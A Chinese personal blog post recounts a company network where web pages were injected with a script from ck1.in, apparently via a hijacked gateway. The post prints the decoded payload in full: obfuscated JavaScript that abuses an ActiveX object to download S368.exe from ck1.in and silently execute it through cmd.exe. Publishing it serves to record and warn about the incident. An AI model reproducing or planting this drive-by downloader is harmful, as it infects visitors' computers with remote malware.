Jacky小站

　　昨天发现公司的网络出现异常，一些网站莫名其妙地出现乱码。仔细排查后，发现原来是网页被加入这么一句：“<script src=http://ck1.in/N.JS></script>”，顺藤摸瓜之下，解开了它的真实面目：
document.writeln("<script src=\"http:\/\/ck1.in\/S368\/NewJs2.js\"><\/script>"); document.writeln("<script>"); document.writeln("function Start(){"); document.writeln("var Then = new Date() "); document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)"); document.writeln("var cookieString = new String(document.cookie)"); document.writeln("var cookieHeader = \"Cookie1=\" "); document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)"); document.writeln("if (beginPosition != -1){ "); document.writeln("} else "); document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() "); document.writeln(""); document.writeln("}"); document.writeln("}"); document.writeln("Start();"); document.writeln("<\/script>")
document.writeln("window.onerror=function(){return true;}<\/script>"); document.writeln(""); document.writeln(" DZ='http://ck1.in/S368/S368.exe';"); document.writeln(" TestHiHi=\'\';"); document.writeln("function GnMs(n) "); document.writeln("{ "); document.writeln(" var numberMs = Math.random()*n;"); document.writeln(" return '~Temp'+Math.round(numberMs)+'.tmp';"); document.writeln("} "); document.writeln(" try "); document.writeln("{"); document.writeln(" TestHiHi=\'\';"); document.writeln(" var Bf=document.createElement(\"object\");"); document.writeln(" Bf.setAttribute(\"classid\",\"clsid:BD96C556-65A3-11D0-983A-00C04FC29E36\");"); document.writeln(" var Kx=Bf.CreateObject(\"Microsoft.XMLHTTP\",\"\");"); document.writeln(" var AS=Bf.CreateObject(\"Adodb.Stream\",\"\");"); document.writeln(" TestHiHi=\'\';"); document.writeln(" AS.type=1;"); document.writeln(" TestHiHi=\'\';"); document.writeln(" Kx.open(\"GET\", DZ,0);"); document.writeln(" TestHiHi=\'\';"); document.writeln(" Kx.send();"); document.writeln(" TestHiHi=\'\';"); document.writeln(" Ns1=GnMs(9999);"); document.writeln(" TestHiHi=\'\';"); document.writeln(" var cF=Bf.CreateObject(\"Scripting.FileSystemObject\",\"\");"); document.writeln(" var NsTmp=cF.GetSpecialFolder(0);Ns1= cF.BuildPath(NsTmp,Ns1);AS.Open();AS.Write(Kx.responseBody);"); document.writeln(" AS.SaveToFile(Ns1,2);AS.Close();var q=Bf.CreateObject(\"Shell.Application\",\"\");"); document.writeln(" ok1=cF.BuildPath(NsTmp+\'\\system32\',\'cmd.exe\');"); document.writeln(" q.SHeLLExecute(ok1,\'/c \'+Ns1,\"\",\"open \",0);"); document.writeln(" TestHiHi=\'\';"); document.writeln("} "); document.writeln(" catch(MsI) { MsI=1;}"); document.writeln(" TestHiHi=\'\';"); document.writeln("<\/script>")

　　回家后再上相同的网站却又正常，于是怀疑是公司的网关被劫持了。到Google去搜了一下，却又没有相关的资料，只有百度知道里面有三个未解决的问题提到了相同的情况。
　　今天上班又在网上搜索了一通，发现Google也搜到了不少相同的问题，但仍然没有能从根本上解决问题的方法。
　　本站将继续关注此次劫持事件~~~~~~~~~~~~~~~~~~~~
　　问题已经解决，详细方法见《该死的ck1.in！！！（续）》一文。